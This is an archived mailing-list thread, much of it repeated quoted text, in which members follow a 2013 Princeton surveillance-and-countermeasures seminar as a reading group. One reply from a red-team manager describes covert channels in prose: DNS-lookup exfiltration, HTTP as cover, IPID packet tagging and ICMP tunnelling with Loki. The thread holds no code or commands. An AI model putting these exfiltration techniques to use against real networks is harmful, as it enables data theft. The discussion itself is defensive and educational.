Fwd: COS 597G: Surveillance and Countermeasures, Fall 2013

============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

that seems like a very cool reading list. Are you thinking of starting up a reading group?

Cody Smith

On Mon, Sep 9, 2013 at 10:09 AM, Owen Densmore <[hidden email]> wrote:

Another gem from twitter:

Ed Felten

Preliminary syllabus for my "Surveillance and Countermeasures" seminar: http://ow.ly/oHs9a 

Retweeted by BrendanEich

http://www.cs.princeton.edu/courses/archive/fall13/cos597G/

Sounds fascinating .. and not all tech, lots of history and spy craft.

   -- Owen

============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

I'm in.  A number of journos are interested in/worried about this.

-tj

On Mon, Sep 9, 2013 at 12:30 PM, Steve Smith <[hidden email]> wrote:

Cody -


I think you just started one (by asking). 

I suggest a Google Group for discussion and following the class schedule even if we don't have the benefit of lecture and class discussions. 

3 or more is a good number... if Owen's alerting us indicates interest, we already have a Quorum!?

- Steve

that seems like a very cool reading list. Are you thinking of starting up a reading group?

Cody Smith

On Mon, Sep 9, 2013 at 10:09 AM, Owen Densmore <[hidden email]> wrote:

Another gem from twitter:

Ed Felten

Preliminary syllabus for my "Surveillance and Countermeasures" seminar: http://ow.ly/oHs9a 

Retweeted by BrendanEich

http://www.cs.princeton.edu/courses/archive/fall13/cos597G/

Sounds fascinating .. and not all tech, lots of history and spy craft.

   -- Owen

============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

--

==========================================
J. T. Johnson
Institute for Analytic Journalism   --   Santa Fe, NM USA
505.577.6482(c)                                    505.473.9646(h)
Twitter: jtjohnson

http://www.jtjohnson.com                  [hidden email]
==========================================

============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

I don't know if anyone (else) is doing the reading for this course....

I lagged a bit but am just now catching up... the first 5 readings were history/law and *very* timely and relevant to the current situation with the NSA, etc.  


The following are more technical:

Secure Email
Tor (secure - obfuscated?) Routing
Network Traffic Analysis
Steganography
Covert Channels
Chat (off the record)
.....

I've done my time working with or studying all of these at a fairly limited level and found each of the resources offered to be very well chosen...  a good review for me and a good introduction for anyone with modest technical knowledge.    They are also "bite sized"... I find the reading assignment for each week requiring less than an hour, though one can use these as a point of departure that could consume a whole week!

I'm glad to hear that our best and brightest are being taught these things.

- Steve

I'm in.  A number of journos are interested in/worried about this.

-tj

On Mon, Sep 9, 2013 at 12:30 PM, Steve Smith <[hidden email]> wrote:

Cody -


I think you just started one (by asking). 

I suggest a Google Group for discussion and following the class schedule even if we don't have the benefit of lecture and class discussions. 

3 or more is a good number... if Owen's alerting us indicates interest, we already have a Quorum!?

- Steve

that seems like a very cool reading list. Are you thinking of starting up a reading group?

Cody Smith

On Mon, Sep 9, 2013 at 10:09 AM, Owen Densmore <[hidden email]> wrote:

Another gem from twitter:

Ed Felten

Preliminary syllabus for my "Surveillance and Countermeasures" seminar: http://ow.ly/oHs9a 

Retweeted by BrendanEich

http://www.cs.princeton.edu/courses/archive/fall13/cos597G/

Sounds fascinating .. and not all tech, lots of history and spy craft.

   -- Owen

============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

--

==========================================
J. T. Johnson
Institute for Analytic Journalism   --   Santa Fe, NM USA
505.577.6482(c)                                    505.473.9646(h)
Twitter: jtjohnson

http://www.jtjohnson.com                  [hidden email]
==========================================

============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

WRT the Covert Channels paper - 
============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

WRT the Covert Channels paper - 

  Header extensions and IP options are not actually practical channels.  They sound good but in practice they run afoul of the problem that network equipment, particularly routers, process packets in hardware - unless they have unusual extensions or IP Options, in which case the packets are thrown up to the software layer.  That means they will be slower, all through the Internet, and they are easily detected.

  We've used the IPID trick but not for a cover channel.  We wanted to be able to distinguish our traffic from actual attackers (use control for red teams), so we created an HMAC of the packet and inserted the first few bytes into the IPID field.  At the target's end, they can use a tool fed from tcpdump or other appropriate tool and check whether the IPID bytes match our expected value - we use a shared secret salt.

  Most of the other tricks are low bandwidth - not really useful for gigabytes of information.

  The two most commonly used covert channels in current malware are http and DNS.  The sheer volume of http makes it impractical to catch all requests - many typical, public, web-pages include requests to dozens of web-sites other than the primary one.  The many web-bug tricks and advertising spyware activities make this a really large pool of bits in which an adversary can hide.  We've used the trick of sending data out as DNS lookups against customer networks and it works like a charm.  We literally showed a security manager (later the CISO for the organization) the exfiltration and he didn't believe it twice, despite the evidence of displaying the exfiltrated file on our external web-site.

  I have a copy of the Loki source code (very clean) and sending unrequested ICPM echo responses still works in some places.  The author of Loki, who went by the name Mixter, created another covert channel that simply uses alternate IP protocols.  Some routers will route any IP protocol by default while others will only route those IP protocols explicitly specified.

Ray Parks

Consilient Heuristician/IDART Program Manager

V: 505-844-4024  M: 505-238-9359  P: 505-951-6084

NIPR: [hidden email]

SIPR: [hidden email] (send NIPR reminder)

JWICS: [hidden email] (send NIPR reminder)

On Oct 18, 2013, at 8:27 PM, Steve Smith wrote:

Forgot to relate the tidbit that motivated me to update the group:

The "Covert Channels" reading, which is a very specialized example of Steganography (by my measure) has some very clever ideas in it which I'd never encountered before...   all kind of obvious once described but nevertheless quite clever.

- Steve

I don't know if anyone (else) is doing the reading for this course....

I lagged a bit but am just now catching up... the first 5 readings were history/law and *very* timely and relevant to the current situation with the NSA, etc.  


The following are more technical:

Secure Email
Tor (secure - obfuscated?) Routing
Network Traffic Analysis
Steganography
Covert Channels
Chat (off the record)
.....

I've done my time working with or studying all of these at a fairly limited level and found each of the resources offered to be very well chosen...  a good review for me and a good introduction for anyone with modest technical knowledge.    They are also "bite sized"... I find the reading assignment for each week requiring less than an hour, though one can use these as a point of departure that could consume a whole week!

I'm glad to hear that our best and brightest are being taught these things.

- Steve

I'm in.  A number of journos are interested in/worried about this.

-tj

On Mon, Sep 9, 2013 at 12:30 PM, Steve Smith <[hidden email]> wrote:

Cody -


I think you just started one (by asking). 

I suggest a Google Group for discussion and following the class schedule even if we don't have the benefit of lecture and class discussions. 

3 or more is a good number... if Owen's alerting us indicates interest, we already have a Quorum!?

- Steve

that seems like a very cool reading list. Are you thinking of starting up a reading group?

Cody Smith

On Mon, Sep 9, 2013 at 10:09 AM, Owen Densmore <[hidden email]> wrote:

Another gem from twitter:

Ed Felten

Preliminary syllabus for my "Surveillance and Countermeasures" seminar: http://ow.ly/oHs9a 

Retweeted by BrendanEich

http://www.cs.princeton.edu/courses/archive/fall13/cos597G/

Sounds fascinating .. and not all tech, lots of history and spy craft.

   -- Owen

============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

--

==========================================
J. T. Johnson
Institute for Analytic Journalism   --   Santa Fe, NM USA
505.577.6482(c)                                    505.473.9646(h)
Twitter: jtjohnson

http://www.jtjohnson.com                  [hidden email]
==========================================

============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

Files in modern systems tend to grow faster than Moore's law.  It's possible to exfiltrate some information via low bandwidth channels - but the type of information that is of high value is frequently either related to system access or to legacy systems.  If one has enough access to create a covert channel, then getting the root password is OBE.  Hopefully, legacy systems that are important enough that an adversary might want to send out info about them are not storing that info where a covert channel has external access.  There are probably edge cases - but knowing in advance of that situation is unlikely, so one would install a high -bandwidth covert channel by default.
============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

I am amused at the "State-Sponsored Malware" segment - the two papers cover the two extremes of the range of activities.
============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

On 10/22/2013 05:43 PM, Parks, Raymond wrote:
> As far as privacy is concerned - I'm surprised that there is no
> discussion of "big data" and how to attack it to protect one's privacy.
>
The absence of that discussion is one defense.  :-)

Marcus

============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

I don't mean attack the servers and systems - I mean the tradecraft necessary to keep big data algorithms from tracking.  That's knowledge that the protagonists of big data need if they hope to be effective in detecting sophisticated adversaries.

Ray Parks


----- Original Message -----
From: Marcus G. Daniels [mailto:[hidden email]]
Sent: Tuesday, October 22, 2013 06:03 PM
To: The Friday Morning Applied Complexity Coffee Group <[hidden email]>
Subject: Re: [FRIAM] [EXTERNAL] Fwd: COS 597G: Surveillance and Countermeasures, Fall 2013

On 10/22/2013 05:43 PM, Parks, Raymond wrote:
> As far as privacy is concerned - I'm surprised that there is no
> discussion of "big data" and how to attack it to protect one's privacy.
>
The absence of that discussion is one defense.  :-)

Marcus

============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

On 10/22/13 7:49 PM, Parks, Raymond wrote:
> I don't mean attack the servers and systems - I mean the tradecraft necessary to keep big data algorithms from tracking.  That's knowledge that the protagonists of big data need if they hope to be effective in detecting sophisticated adversaries.
>
There seems to be an assumption that individuals who might wish to
`challenge an organization' do so because they've been indoctrinated
somehow.   That there must be another party, a command and control, a
boss, or at least conspirators behind any individual action and all
that's needed is to uncover it.   Thus the rationale for surveillance.

Yet, reflecting on my own motivations, I separate those goals where I
see true opportunity or intrinsic merit from those goals where I'm one
of many possible hired guns doing some job.  Frequently, I find that I
make observations that yield the same conclusions that some of my
colleagues do.  We share the same inputs and arrive at the same outputs,
but do not coordinate or communicate in the process. To me, this kind of
pure resonance is one basis for trust in the judgement of others as well
as self confidence.

With such people, I do not need worry much about how they will plan-out
and execute a project.   They just will.   Those that I have reason to
believe share values similar to mine will probably even arrive at a
result near to what I would do.

What I meant originally is that a fool proof way to defeat big data
(mining) or direct surveillance is to not communicate, but to be of like
mind.

Marcus

============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com